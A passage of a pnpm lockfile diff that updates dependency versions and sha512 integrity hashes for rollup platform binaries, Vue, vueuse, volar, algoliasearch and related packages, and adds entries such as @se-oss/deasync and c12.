sha512-Mk5ha2RQSgyFfmYYLkBpPnUk8D8FriBxesO1u9O75X0mHgXL1UQcH5Itl2lurWL2tj0RxV9b9tJgipac0hRY9A==} cpu: [ppc64] os: [linux] + libc: [glibc] - '@rollup/rollup-linux-ppc64-musl@4.59.0': - resolution: {integrity: sha512-+2kLtQ4xT3AiIxkzFVFXfsmlZiG5FXYW7ZyIIvGA7Bdeuh9Z0aN4hVyXS/G1E9bTP/vqszNIN/pUKCk/BTHsKA==} + '@rollup/rollup-linux-ppc64-musl@4.62.2': + resolution: {integrity: sha512-CjvEnqJL/0/TQ3TXX3OPIJ/kmBellrWd4heXUmHeJlTnmwjKpSJzoehLaL6Xk0ZnMHBu9dZuFADNOrtjF4v+2w==} cpu: [ppc64] os: [linux] + libc: [musl] - '@rollup/rollup-linux-riscv64-gnu@4.59.0': - resolution: {integrity: sha512-NDYMpsXYJJaj+I7UdwIuHHNxXZ/b/N2hR15NyH3m2qAtb/hHPA4g4SuuvrdxetTdndfj9b1WOmy73kcPRoERUg==} + '@rollup/rollup-linux-riscv64-gnu@4.62.2': + resolution: {integrity: sha512-1SiZbzwdkaDURsew/tSOrooKiYy7EQGT6m8ufavAi9NEyQb/6VuIxFXAL1fqa4iZe3g4NbNk4P7J32z2tw5Mgg==} cpu: [riscv64] os: [linux] + libc: [glibc] - '@rollup/rollup-linux-riscv64-musl@4.59.0': - resolution: {integrity: sha512-nLckB8WOqHIf1bhymk+oHxvM9D3tyPndZH8i8+35p/1YiVoVswPid2yLzgX7ZJP0KQvnkhM4H6QZ5m0LzbyIAg==} + '@rollup/rollup-linux-riscv64-musl@4.62.2': + resolution: {integrity: sha512-nQts12zJ3NQRoE6uYljOH89v7szzLDvG2JD/vsX+vGXU8w/At1GowTZ5/7qeFQ8m7L55rpR8Okugnuo5bgjy2Q==} cpu: [riscv64] os: [linux] + libc: [musl] - '@rollup/rollup-linux-s390x-gnu@4.59.0': - resolution: {integrity: sha512-oF87Ie3uAIvORFBpwnCvUzdeYUqi2wY6jRFWJAy1qus/udHFYIkplYRW+wo+GRUP4sKzYdmE1Y3+rY5Gc4ZO+w==} + '@rollup/rollup-linux-s390x-gnu@4.62.2': + resolution: {integrity: sha512-E9/ll019jhPIJgpzfZoIkBGhcz+kKNgVWYRY0zr9srBdPPFVpvOKW8VaJKUbeK+eZXyQF9ltME+Kk6affeaPgg==} cpu: [s390x] os: [linux] + libc: [glibc] - '@rollup/rollup-linux-x64-gnu@4.59.0': - resolution: {integrity: sha512-3AHmtQq/ppNuUspKAlvA8HtLybkDflkMuLK4DPo77DfthRb71V84/c4MlWJXixZz4uruIH4uaa07IqoAkG64fg==} + '@rollup/rollup-linux-x64-gnu@4.62.2': + resolution: {integrity: sha512-5BqxR/pshjey51iliyzTD5Xi3EN0aLmQ2lZ3lvefVV9c82BvrLo2/6OT55iifpWBufs6kdwWbuOKS841DrmK9A==} cpu: [x64] os: [linux] + libc: [glibc] - '@rollup/rollup-linux-x64-musl@4.59.0': - resolution: {integrity: sha512-2UdiwS/9cTAx7qIUZB/fWtToJwvt0Vbo0zmnYt7ED35KPg13Q0ym1g442THLC7VyI6JfYTP4PiSOWyoMdV2/xg==} + '@rollup/rollup-linux-x64-musl@4.62.2': + resolution: {integrity: sha512-uNN83XxQrRAh/w0/pmAfibcwyb6YWt4gP+dpnQKPVJshAloQ785ii8CT8ZCIxkGg9opVsvAlGhFitSm6D1Jjpg==} cpu: [x64] os: [linux] + libc: [musl] - '@rollup/rollup-openbsd-x64@4.59.0': - resolution: {integrity: sha512-M3bLRAVk6GOwFlPTIxVBSYKUaqfLrn8l0psKinkCFxl4lQvOSz8ZrKDz2gxcBwHFpci0B6rttydI4IpS4IS/jQ==} + '@rollup/rollup-openbsd-x64@4.62.2': + resolution: {integrity: sha512-srjEIxSH3LRnJN6THczDHWQplqEMFiAJrTab0msUryh9kwNpkICf3Ea6q6MN/2cZwRFUNx5w+h6Hpi4QuHS6Zg==} cpu: [x64] os: [openbsd] - '@rollup/rollup-openharmony-arm64@4.59.0': - resolution: {integrity: sha512-tt9KBJqaqp5i5HUZzoafHZX8b5Q2Fe7UjYERADll83O4fGqJ49O1FsL6LpdzVFQcpwvnyd0i+K/VSwu/o/nWlA==} + '@rollup/rollup-openharmony-arm64@4.62.2': + resolution: {integrity: sha512-8hOJnxgbyObnCm5AlRA3A931xX19xq80RjVTKgJOvEKWqJruP/Uf12IbAOaDjjEXYRewwHLfmF0YRIdK3OwKWA==} cpu: [arm64] os: [openharmony] - '@rollup/rollup-win32-arm64-msvc@4.59.0': - resolution: {integrity: sha512-V5B6mG7OrGTwnxaNUzZTDTjDS7F75PO1ae6MJYdiMu60sq0CqN5CVeVsbhPxalupvTX8gXVSU9gq+Rx1/hvu6A==} + '@rollup/rollup-win32-arm64-msvc@4.62.2': + resolution: {integrity: sha512-mmF4AY1i0hG/bLWUctUq59gtmgaSIRa3cu/A3JFRp/sCNEme2bgDEiDS22P9FbnJB8NJNF4jPJiSP5RHQpUTDg==} cpu: [arm64] os: [win32] - '@rollup/rollup-win32-ia32-msvc@4.59.0': - resolution: {integrity: sha512-UKFMHPuM9R0iBegwzKF4y0C4J9u8C6MEJgFuXTBerMk7EJ92GFVFYBfOZaSGLu6COf7FxpQNqhNS4c4icUPqxA==} + '@rollup/rollup-win32-ia32-msvc@4.62.2': + resolution: {integrity: sha512-DZgkknc6jhHrk46V25vbAM0zZkyP0nSDkJB8/dRkLTxv470dOmWDqGoEJl/9A0dFfS7yE3REOwNDxpHwSLSt0Q==} cpu: [ia32] os: [win32] - '@rollup/rollup-win32-x64-gnu@4.59.0': - resolution: {integrity: sha512-laBkYlSS1n2L8fSo1thDNGrCTQMmxjYY5G0WFWjFFYZkKPjsMBsgJfGf4TLxXrF6RyhI60L8TMOjBMvXiTcxeA==} + '@rollup/rollup-win32-x64-gnu@4.62.2': + resolution: {integrity: sha512-T6xr6ucWSFto+VGajA8YH26LdpHRuP4YLHEKAtCWvJDOlnmWcDZVCI2Jmjr+IFHDlt2zRaTAKE4tfjTaWLgJBg==} + cpu: [x64] + os: [win32] + + '@rollup/rollup-win32-x64-msvc@4.62.2': + resolution: {integrity: sha512-BfzEnDJOt9T8M989/lA37EcJgat01wLRnoi5dQf3QzOH7jzpqTAzdDbVfRljVr5r+jzKqpbHeyOfAaXxAd0PAA==} + cpu: [x64] + os: [win32] + + '@se-oss/deasync-darwin-arm64@1.0.1': + resolution: {integrity: sha512-0YWmIDEGQfW3GGopmZHhfA6mamsG0HFKZhmBzHVyFiMKkJts8kpQwGbGrWlK8eOAoPCihOsG6tCotYR3p7HZaQ==} + engines: {node: '>= 10'} + cpu: [arm64] + os: [darwin] + + '@se-oss/deasync-darwin-x64@1.0.1': + resolution: {integrity: sha512-r3FRTLIXqGqOb1DjTLW3YhO/Dd1vA2qRLP0Ym3Wmk3yMv6c/nm15zg6UVoXbgBu8cjbvcsI/OfbHPdErmjMWsw==} + engines: {node: '>= 10'} + cpu: [x64] + os: [darwin] + + '@se-oss/deasync-linux-arm64-gnu@1.0.1': + resolution: {integrity: sha512-657uRew7fZAx663Li03ilLV2lN09Dqb/NxawlDu8kKmboK1BLitHJRS+taiT5oFZqyIDrU45tlQKfCrW0p0sYA==} + engines: {node: '>= 10'} + cpu: [arm64] + os: [linux] + libc: [glibc] + + '@se-oss/deasync-linux-arm64-musl@1.0.1': + resolution: {integrity: sha512-IE3fIQPIJtko4lx9sRam+Zz0P4xbpAPJgDCHaz6k9cP1yUvVI179B4IZRnFx0GyjyQpm0KhHoIGHJc4KUmA81Q==} + engines: {node: '>= 10'} + cpu: [arm64] + os: [linux] + libc: [musl] + + '@se-oss/deasync-linux-x64-gnu@1.0.1': + resolution: {integrity: sha512-XQl7etZESGIjIraCyxfAey8ZTIJUB4dUFU3rPR/xLVn9bKpZGlJLIms0z3hoHX9mipO+Cqo53vK4IVm6A7U/ww==} + engines: {node: '>= 10'} cpu: [x64] + os: [linux] + libc: [glibc] + + '@se-oss/deasync-linux-x64-musl@1.0.1': + resolution: {integrity: sha512-vWgFAZlqImqMV6jhCWV7C9wcCS1eb1ajhlKduBRPfyUxxkoObe+EqTG2BKJAuafxp3/KS1aUsIMJma9mhwFvow==} + engines: {node: '>= 10'} + cpu: [x64] + os: [linux] + libc: [musl] + + '@se-oss/deasync-win32-arm64-msvc@1.0.1': + resolution: {integrity: sha512-yk7lEE7Zd8GX7o6CuUbg3HnnmUhBx4tgfn5ff3eoq05CgBO6Z3ZtL4l+utAe1cxcFaXPhyvcgnHYyA4OF544tg==} + engines: {node: '>= 10'} + cpu: [arm64] os: [win32] - '@rollup/rollup-win32-x64-msvc@4.59.0': - resolution: {integrity: sha512-2HRCml6OztYXyJXAvdDXPKcawukWY2GpR5/nxKp4iBgiO3wcoEGkAaqctIbZcNB6KlUQBIqt8VYkNSj2397EfA==} + '@se-oss/deasync-win32-x64-msvc@1.0.1': + resolution: {integrity: sha512-ixizmuLGRPGyAesWUNWVzVOsvuunNb/qMqU8SmjfLR/vVgzdQEkSHFf+fkX9GXPN6FDv+DAz5uskTzhjUyCXFA==} + engines: {node: '>= 10'} cpu: [x64] os: [win32] + '@se-oss/deasync@1.0.1': + resolution: {integrity: sha512-Ha7P/xCNxOuH72BNdLRWs4TT8rsMMrERnHtfKWBeTWu+UFW9OBTrRgfZJOlbAAQFR0l4Q30cpAn8CuR7PXWcPg==} + engines: {node: '>= 10'} + '@shikijs/core@2.5.0': resolution: {integrity: sha512-uu/8RExTKtavlpH7XqnVYBrfBkUc20ngXiX9NSrBhOVZYv/7XQRKUyhtkeflY5QsxC0GbJThCerruZfsUaSldg==} @@ -572,11 +857,14 @@ packages: '@sxzz/popperjs-es@2.11.8': resolution: {integrity: sha512-wOwESXvvED3S8xBmcPWHs2dUuzrE4XiZeFu7e1hROIJkm02a49N120pmOXxY33sBb6hArItm5W5tcg1cBtV+HQ==} - '@types/bun@1.3.10': - resolution: {integrity: sha512-0+rlrUrOrTSskibryHbvQkDOWRJwJZqZlxrUs1u4oOoTln8+WIXBPmAuCF35SWB2z4Zl3E84Nl/D0P7803nigQ==} + '@tybys/wasm-util@0.10.3': + resolution: {integrity: sha512-F3fo1MYrRJYL3zER0OUOmkutjr1Vp23m7OsSgp7nq4SP6OqX6C/56XFIPAl5bt3zaBRjmW7SGz3u/6LwFpYcOg==} + + '@types/bun@1.3.14': + resolution: {integrity: sha512-h1hFqFVcvAvD9j9K7ZW7vd82aSA+rTdznZa+5bwvCwqSB1jmmfLcbIWhOLx1/+boy/xmjgCs/OMUL8hRJSmnPw==} - '@types/estree@1.0.8': - resolution: {integrity: sha512-dWHzHa2WqEXI/O1E9OjrocMTKJl2mSrEolh1Iomrv6U+JuNwaHXsXx9bLu5gG7BUWFIN0skIQJQ/L1rIex4X6w==} + '@types/estree@1.0.9': + resolution: {integrity: sha512-GhdPgy1el4/ImP05X05Uw4cw2/M93BCUmnEvWZNStlCzEKME4Fkk+YpoA5OiHNQmoS7Cafb8Xa3Pya8m1Qrzeg==} '@types/hast@3.0.4': resolution: {integrity: sha512-WPs+bbQw5aCj+x6laNGWLH3wviHtoCv/P3+otBhbOhJgG8qtpdAMlTCxLtsTWA7LH1Oh/bFCHsBn0TPS5m30EQ==} @@ -587,8 +875,8 @@ packages: '@types/lodash-es@4.17.12': resolution: {integrity: sha512-0NgftHUcV4v34VhXm8QBSftKVXtbkBG3ViCjs6+eJ5a6y6Mi/jiFGPc1sC7QK+9BFhWrURE3EOggmWaSxL9OzQ==} - '@types/lodash@4.17.23': - resolution: {integrity: sha512-RDvF6wTulMPjrNdCoYRC8gNR880JNGT8uB+REUpC2Ns4pRqQJhGz90wh7rgdXDPpCczF3VGktDuFGVnz8zP7HA==} + '@types/lodash@4.17.24': + resolution: {integrity: sha512-gIW7lQLZbue7lRSWEFql49QJJWThrTFFeIMJdp3eH4tKoxm1OvEPg02rm4wCCSHS0cL3/Fizimb35b7k8atwsQ==} '@types/markdown-it@14.1.2': resolution: {integrity: sha512-promo4eFwuiW+TfGxhi+0x3czqTYJkG8qB17ZUJiVF10Xm7NLVRSLUsfRTU/6h1e24VvRnXCx+hG7li58lkzog==} @@ -599,8 +887,8 @@ packages: '@types/mdurl@2.0.0': resolution: {integrity: sha512-RGdgjQUZba5p6QEFAVx2OGb8rQDL/cPRG7GiedRzMcJ1tYnUANBncjbSB1NRGwbvjcPeikRABz2nshyPk1bhWg==} - '@types/node@22.19.13': - resolution: {integrity: sha512-akNQMv0wW5uyRpD2v2IEyRSZiR+BeGuoB6L310EgGObO44HSMNT8z1xzio28V8qOrgYaopIDNA18YgdXd+qTiw==} + '@types/node@26.1.0': + resolution: {integrity: sha512-O0A1G3xPGy4w7AgQdAQYUlQ+BKk2Oovw8eRpofyp5KdBZULnbe+WqaOVNrm705SHphCiG4XHsACrSmPu1f+Kgw==} '@types/trusted-types@2.0.7': resolution: {integrity: sha512-ScaPdn1dQczgbl0QFTeTOmVHFULt394XJgOQNoyVhZ6r2vLnMLJfBPd53SB52T/3G36VI1/g2MZaX0cwDuXsfw==} @@ -608,14 +896,11 @@ packages: '@types/unist@3.0.3': resolution: {integrity: sha512-ko/gIFJRv177XgZsZcBwnqJN5x/Gien8qNOn0D5bQU/zAzVf9Zt3BlcUiLqhV9y4ARk0GbT3tnUiPNgnTXzc/Q==} - '@types/web-bluetooth@0.0.20': - resolution: {integrity: sha512-g9gZnnXVq7gM7v3tJCWV/qw7w+KeOlSHAhgF9RytFyifW6AF61hdT2ucrYhPq9hLs5JIryeupHV3qGk95dH9ow==} - '@types/web-bluetooth@0.0.21': resolution: {integrity: sha512-oIQLCGWtcFZy2JW77j9k8nHzAOpqMHLQejDA48XXMWH6tjCQHz5RCFz1bzsmROyL6PUm+LLnUiI4BCn221inxA==} - '@ungap/structured-clone@1.3.0': - resolution: {integrity: sha512-WmoN8qaIAo7WTYWbAZuG8PYEhn5fkz7dZrqTBZ7dtt//lL2Gwms1IcnQ5yHqjDfX8Ft5j4YzDM23f87zBfDe9g==} + '@ungap/structured-clone@1.3.2': + resolution: {integrity: sha512-5jsZFwgR5rTdKwidH9Qmat75RKwqfpKlWWB1frDkljN127mwqBu8K0PYo7/hFpF03IEJpfVPpCQDY/eDx3iHvA==} '@vitejs/plugin-vue@5.2.4': resolution: {integrity: sha512-7Yx/SXSOcQq5HiiV3orevHUFn+pmMB4cgbEkDYgnkUWb0WfeQ/wa2yFv6D5ICiCQOVpjA7vYDXrC7AGO8yjDHA==} @@ -624,76 +909,64 @@ packages: vite: ^5.0.0 || ^6.0.0 vue: ^3.2.25 - '@volar/language-core@2.4.15': - resolution: {integrity: sha512-3VHw+QZU0ZG9IuQmzT68IyN4hZNd9GchGPhbD9+pa8CVv7rnoOZwo7T8weIbrRmihqy3ATpdfXFnqRrfPVK6CA==} - - '@volar/source-map@2.4.15': - resolution: {integrity: sha512-CPbMWlUN6hVZJYGcU/GSoHu4EnCHiLaXI9n8c9la6RaI9W5JHX+NqG+GSQcB0JdC2FIBLdZJwGsfKyBB71VlTg==} + '@volar/language-core@2.4.28': + resolution: {integrity: sha512-w4qhIJ8ZSitgLAkVay6AbcnC7gP3glYM3fYwKV3srj8m494E3xtrCv6E+bWviiK/8hs6e6t1ij1s2Endql7vzQ==} - '@volar/typescript@2.4.15': - resolution: {integrity: sha512-2aZ8i0cqPGjXb4BhkMsPYDkkuc2ZQ6yOpqwAuNwUoncELqoy5fRgOQtLR9gB0g902iS0NAkvpIzs27geVyVdPg==} + '@volar/source-map@2.4.28': + resolution: {integrity: sha512-yX2BDBqJkRXfKw8my8VarTyjv48QwxdJtvRgUpNE5erCsgEUdI2DsLbpa+rOQVAJYshY99szEcRDmyHbF10ggQ==} - '@vue/compiler-core@3.5.29': - resolution: {integrity: sha512-cuzPhD8fwRHk8IGfmYaR4eEe4cAyJEL66Ove/WZL7yWNL134nqLddSLwNRIsFlnnW1kK+p8Ck3viFnC0chXCXw==} + '@volar/typescript@2.4.28': + resolution: {integrity: sha512-Ja6yvWrbis2QtN4ClAKreeUZPVYMARDYZl9LMEv1iQ1QdepB6wn0jTRxA9MftYmYa4DQ4k/DaSZpFPUfxl8giw==} - '@vue/compiler-dom@3.5.29': - resolution: {integrity: sha512-n0G5o7R3uBVmVxjTIYcz7ovr8sy7QObFG8OQJ3xGCDNhbG60biP/P5KnyY8NLd81OuT1WJflG7N4KWYHaeeaIg==} + '@vue/compiler-core@3.5.39': + resolution: {integrity: sha512-16KBTEXAJCpDr0mwlw+AZyhu8iyC7R3S2vBwsI7QnWJU6X3WKc9VKeNEZpiMdZ569qWhz9574L3vV55qRL0Vtw==} - '@vue/compiler-sfc@3.5.29': - resolution: {integrity: sha512-oJZhN5XJs35Gzr50E82jg2cYdZQ78wEwvRO6Y63TvLVTc+6xICzJHP1UIecdSPPYIbkautNBanDiWYa64QSFIA==} + '@vue/compiler-dom@3.5.39': + resolution: {integrity: sha512-oQPigALqYbNxTNPvNgSOe+czwVExfbVF02lz8jP0S3AXJiu3jxYDygNUiqSep4ezzW8XgnubqH63My2A7JR/vg==} - '@vue/compiler-ssr@3.5.29': - resolution: {integrity: sha512-Y/ARJZE6fpjzL5GH/phJmsFwx3g6t2KmHKHx5q+MLl2kencADKIrhH5MLF6HHpRMmlRAYBRSvv347Mepf1zVNw==} + '@vue/compiler-sfc@3.5.39': + resolution: {integrity: sha512-d0ki86iOyN8LoZPBmk5SJWNwHP19CnDDCfuo//+2WJa2g5Ke0Jay983PIBIcSSzldC68I8DrD5GrHV3OSDfodg==} - '@vue/compiler-vue2@2.7.16': - resolution: {integrity: sha512-qYC3Psj9S/mfu9uVi5WvNZIzq+xnXMhOwbTFKKDD7b1lhpnn71jXSFdTQ+WsIEk0ONCd7VV2IMm7ONl6tbQ86A==} + '@vue/compiler-ssr@3.5.39': + resolution: {integrity: sha512-Ce7/wvwMHai74bdszfXExdazFigYnlF9zgCmEQUcM1j0fOymlouZ7XilTYNo8oUjhlnjYOZbGrcYKuqjz89Ucw==} - '@vue/devtools-api@7.7.9': - resolution: {integrity: sha512-kIE8wvwlcZ6TJTbNeU2HQNtaxLx3a84aotTITUuL/4bzfPxzajGBOoqjMhwZJ8L9qFYDU/lAYMEEm11dnZOD6g==} + '@vue/devtools-api@7.7.10': + resolution: {integrity: sha512-KxtEpUOOpFz/qOGRrAwA36QF7DqIA+FXgCYit9mk9wjbaZt0sXOFz81ElOZtKA4HbWHUdwNjZHBFsFFyp5BZiA==} - '@vue/devtools-kit@7.7.9': - resolution: {integrity: sha512-PyQ6odHSgiDVd4hnTP+aDk2X4gl2HmLDfiyEnn3/oV+ckFDuswRs4IbBT7vacMuGdwY/XemxBoh302ctbsptuA==} + '@vue/devtools-kit@7.7.10': + resolution: {integrity: sha512-3WNi2Kq4tbpVbmhml7RiphmAt0279oh3fKNeWMQIrltfX8Q91b4i5PL8DtyNKdwmcsGrV4fg+erwWOmD05CLIw==} - '@vue/devtools-shared@7.7.9': - resolution: {integrity: sha512-iWAb0v2WYf0QWmxCGy0seZNDPdO3Sp5+u78ORnyeonS6MT4PC7VPrryX2BpMJrwlDeaZ6BD4vP4XKjK0SZqaeA==} + '@vue/devtools-shared@7.7.10': + resolution: {integrity: sha512-wOPslzB8vTvpxwdaOcR2qAbwmuSP0L+rhpoC6Cf56V3Jip+HWb7PQQXOUPgBNQARpXsbQX/+mvi8kKucmBGRwQ==} - '@vue/language-core@2.2.12': - resolution: {integrity: sha512-IsGljWbKGU1MZpBPN+BvPAdr55YPkj2nB/TBNGNC32Vy2qLG25DYu/NBN2vNtZqdRbTRjaoYrahLrToim2NanA==} - peerDependencies: - typescript: '*' - peerDependenciesMeta: - typescript: - optional: true + '@vue/language-core@3.3.6': + resolution: {integrity: sha512-LgBMZAy2sR3cQWknpyaxnI6yBkqDfLBPkbdhwRhQCvzfNJRQXPilgQIrdI/v4ytJ0sAq9bWhaPsjqBqneomJ3Q==} - '@vue/reactivity@3.5.29': - resolution: {integrity: sha512-zcrANcrRdcLtmGZETBxWqIkoQei8HaFpZWx/GHKxx79JZsiZ8j1du0VUJtu4eJjgFvU/iKL5lRXFXksVmI+5DA==} + '@vue/reactivity@3.5.39': + resolution: {integrity: sha512-TpsuBJ9gGlZa5d23XcM2y8EXanz9dZeVDQBXRwzy46ItgvM+rWpzs+UVM0wcRLxGvcav0HE5jz2gNL53xlRAog==} - '@vue/runtime-core@3.5.29': - resolution: {integrity: sha512-8DpW2QfdwIWOLqtsNcds4s+QgwSaHSJY/SUe04LptianUQ/0xi6KVsu/pYVh+HO3NTVvVJjIPL2t6GdeKbS4Lg==} + '@vue/runtime-core@3.5.39': + resolution: {integrity: sha512-9GLtNyRvPAUMbX+7ono0RC2j0guo2LXVi8LvcmAooImACUKm0oFf0jjwbX8/H0AE/t1nxhAkn8RSl9PMCzzxZw==} - '@vue/runtime-dom@3.5.29': - resolution: {integrity: sha512-AHvvJEtcY9tw/uk+s/YRLSlxxQnqnAkjqvK25ZiM4CllCZWzElRAoQnCM42m9AHRLNJ6oe2kC5DCgD4AUdlvXg==} + '@vue/runtime-dom@3.5.39': + resolution: {integrity: sha512-7Y6aAGboKcXAZ3ECuUy7RrS5yy2r47dhTp2SKaJmYxjopImaVFaNa5Ne66NwGovsrxVAl5S5rwc7m22UG7Lmww==} - '@vue/server-renderer@3.5.29': - resolution: {integrity: sha512-G/1k6WK5MusLlbxSE2YTcqAAezS+VuwHhOvLx2KnQU7G2zCH6KIb+5Wyt6UjMq7a3qPzNEjJXs1hvAxDclQH+g==} + '@vue/server-renderer@3.5.39': + resolution: {integrity: sha512-yZSakiAGw85rZfG7UM8akMnIF+FmeiNk47uvHf2nVBBSe+dIKUhZuZq9+XgJhbV3nS5Z4ALH23/MpXofW+mbcw==} peerDependencies: - vue: 3.5.29 - - '@vue/shared@3.5.27': - resolution: {integrity: sha512-dXr/3CgqXsJkZ0n9F3I4elY8wM9jMJpP3pvRG52r6m0tu/MsAFIe6JpXVGeNMd/D9F4hQynWT8Rfuj0bdm9kFQ==} - - '@vue/shared@3.5.29': - resolution: {integrity: sha512-w7SR0A5zyRByL9XUkCfdLs7t9XOHUyJ67qPGQjOou3p6GvBeBW+AVjUUmlxtZ4PIYaRvE+1LmK44O4uajlZwcg==} - - '@vueuse/core@10.11.1': - resolution: {integrity: sha512-guoy26JQktXPcz+0n3GukWIy/JDNKti9v6VEMu6kV2sYBsWuGiTU8OWdg+ADfUbHg3/3DlqySDe7JmdHrktiww==} + vue: 3.5.39 - '@vueuse/core@11.3.0': - resolution: {integrity: sha512-7OC4Rl1f9G8IT6rUfi9JrKiXy4bfmHhZ5x2Ceojy0jnd3mHNEvV4JaRygH362ror6/NZ+Nl+n13LPzGiPN8cKA==} + '@vue/shared@3.5.39': + resolution: {integrity: sha512-l1rrBtBfTnmxvtsvdQDXltUUy8S1Y+ZaqdfUzmAnJkTd8Z8rv5v/ytW+TKiqEOWyHPoqtPlNFSs0lhRmYVSHVA==} '@vueuse/core@12.8.2': resolution: {integrity: sha512-HbvCmZdzAu3VGi/pWYm5Ut+Kd9mn1ZHnn4L5G8kOQTPs/IwIAmJoBrmYk2ckLArgMXZj0AW3n5CAejLUO+PhdQ==} + '@vueuse/core@14.3.0': + resolution: {integrity: sha512-aHfz47g0ZhMtTVHmIzMVpJy8ePhhOy68GY5bv110+5DVtZ+W7BsOx+m61UNQqfrWyPztIHIanWa3E2tib3NFIw==} + peerDependencies: + vue: ^3.5.0 + '@vueuse/integrations@12.8.2': resolution: {integrity: sha512-fbGYivgK5uBTRt7p5F3zy6VrETlV9RtZjBqd1/HxGdjdckBgBM4ugP8LHpjolqTj14TXTxSK1ZfgPbHYyGuH7g==} peerDependencies: @@ -735,43 +1008,31 @@ packages: universal-cookie: optional: true - '@vueuse/metadata@10.11.1': - resolution: {integrity: sha512-IGa5FXd003Ug1qAZmyE8wF3sJ81xGLSqTqtQ6jaVfkeZ4i5kS2mwQF61yhVqojRnenVew5PldLyRgvdl4YYuSw==} - - '@vueuse/metadata@11.3.0': - resolution: {integrity: sha512-pwDnDspTqtTo2HwfLw4Rp6yywuuBdYnPYDq+mO38ZYKGebCUQC/nVj/PXSiK9HX5otxLz8Fn7ECPbjiRz2CC3g==} - '@vueuse/metadata@12.8.2': resolution: {integrity: sha512-rAyLGEuoBJ/Il5AmFHiziCPdQzRt88VxR+Y/A/QhJ1EWtWqPBBAxTAFaSkviwEuOEZNtW8pvkPgoCZQ+HxqW1A==} - '@vueuse/shared@10.11.1': - resolution: {integrity: sha512-LHpC8711VFZlDaYUXEBbFBCQ7GS3dVU9mjOhhMhXP6txTV4EhYQg/KGnQuvt/sPAtoUKq7VVUnL6mVtFoL42sA==} - - '@vueuse/shared@11.3.0': - resolution: {integrity: sha512-P8gSSWQeucH5821ek2mn/ciCk+MS/zoRKqdQIM3bHq6p7GXDAJLmnRRKmF5F65sAVJIfzQlwR3aDzwCn10s8hA==} + '@vueuse/metadata@14.3.0': + resolution: {integrity: sha512-BwxmbAzwAVF50+MW57GXOUEV61nFBGnlBvrTqj49PqWJu3uw7hdu72ztXeZ33RdZtDY6kO+bfCAE1PCn88Tktw==} '@vueuse/shared@12.8.2': resolution: {integrity: sha512-dznP38YzxZoNloI0qpEfpkms8knDtaoQ6Y/sfS0L7Yki4zh40LFHEhur0odJC6xTHG5dxWVPiUWBXn+wCG2s5w==} - '@xmldom/xmldom@0.9.8': - resolution: {integrity: sha512-p96FSY54r+WJ50FIOsCOjyj/wavs8921hG5+kVMmZgKcvIKxMXHTrjNJvRgWa/zuX3B6t2lijLNFaOyuxUH+2A==} - engines: {node: '>=14.6'} + '@vueuse/shared@14.3.0': + resolution: {integrity: sha512-bZpge9eSXwa4ToSiqJ7j6KRwhAsneMFoSz3LMWKQDkqimm3D/tbFlrklrs/IOqC8tEcYmXQZJ6N0UrjhBirVCg==} + peerDependencies: + vue: ^3.5.0 - acorn@8.15.0: - resolution: {integrity: sha512-NZyJarBfL7nWwIq+FDL6Zp/yHEhePMNnnJ0y3qfieCrmNvYct8uvtiV41UvlSe6apAfk0fY1FbWx+NwfmpvtTg==} + acorn@8.17.0: + resolution: {integrity: sha512-xRQbDb9BnwDafYNn6Vwl839DYVjqXYb1XVGtWAZ1kcDc6iwAL4hg3B1dZlRiuENFeO2H53gFG3in621AdERVAg==} engines: {node: '>=0.4.0'} hasBin: true - algoliasearch@5.47.0: - resolution: {integrity: sha512-AGtz2U7zOV4DlsuYV84tLp2tBbA7RPtLA44jbVH4TTpDcc1dIWmULjHSsunlhscbzDydnjuFlNhflR3nV4VJaQ==} + algoliasearch@5.55.1: + resolution: {integrity: sha512-FyaFnnsbVPtevQwqSj/SdxE3jAsSsY0BEH8IVLf9rXxEBdAhAmT6VKCVSMWoaPIHVN1Eufh/1w8q6k8URpIkWw==} engines: {node: '>= 14.0.0'} - alien-signals@1.0.13: - resolution: {integrity: sha512-OGj9yyTnJEttvzhTUWuscOvtqxq5vrhF7vL9oS0xJ2mK0ItPYP1/y+vCFebfxoEyAz0++1AIwJ5CMr+Fk3nDmg==} - - ansi-colors@4.1.3: - resolution: {integrity: sha512-/6w/C21Pm1A7aZitlI5Ni/2J6FFQN8i1Cvz3kHABAAbw93v/NlvKdVOqz7CCWz/3iv/JplRSEEZ83XION15ovw==} - engines: {node: '>=6'} + alien-signals@3.2.1: + resolution: {integrity: sha512-I8FjmltrfnDFoZedi5CG8DghVYNhzb/Ijluz7tCSJH0xpd0484Kowhbb1XDYOxfJpU1p5wnM2X54dA+IfGyD1g==} anymatch@3.1.3: resolution: {integrity: sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==} @@ -794,16 +1055,24 @@ packages: boolbase@1.0.0: resolution: {integrity: sha512-JZOSA7Mo9sNGB8+UjSgzdLtokWAky1zbztM3WRLCbZ70/3cTANmQmOdR7y2g+J0e2WXywy1yS468tY+IruqEww==} - brace-expansion@5.0.3: - resolution: {integrity: sha512-fy6KJm2RawA5RcHkLa1z/ScpBeA762UF9KmZQxwIbDtRJrgLzM10depAiEQ+CXYcoiqW1/m96OAAoke2nE9EeA==} + brace-expansion@5.0.7: + resolution: {integrity: sha512-7oFy703dxfY3/NLxC1fh2SUCQ0H9rmAY+5EpDVfXjUTTs+HEwR2nYaqLv+GWcTsumwxPfiz6CzCNkwXwBUwqCA==} engines: {node: 18 || 20 || >=22} braces@3.0.3: resolution: {integrity: sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==} engines: {node: '>=8'} - bun-types@1.3.10: - resolution: {integrity: sha512-tcpfCCl6XWo6nCVnpcVrxQ+9AYN1iqMIzgrSKYMB/fjLtV2eyAVEg7AxQJuCq/26R6HpKWykQXuSOq/21RYcbg==} + bun-types@1.3.14: + resolution: {integrity: sha512-4N0ig0fEomHt5R0KCFWjovxow98rIoRwKolrYdCcknNwMekCXRnWEUvgu5soYV8QXtVsrUD8B95MBOZGPvr6KQ==} + + c12@3.3.4: + resolution: {integrity: sha512-cM0ApFQSBXuourJejzwv/AuPRvAxordTyParRVcHjjtXirtkzM0uK2L9TTn9s0cXZbG7E55jCivRQzoxYmRAlA==} + peerDependencies: + magicast: '*' + peerDependenciesMeta: + magicast: + optional: true ccount@2.0.1: resolution: {integrity: sha512-eyrF0jiFpY+3drT6383f1qhkbGsLSifNAjA61IUjZjmLCWjItY6LB9ft9YhoDgwfmclB2zhu51Lc7+95b8NRAg==} @@ -814,39 +1083,38 @@ packages: 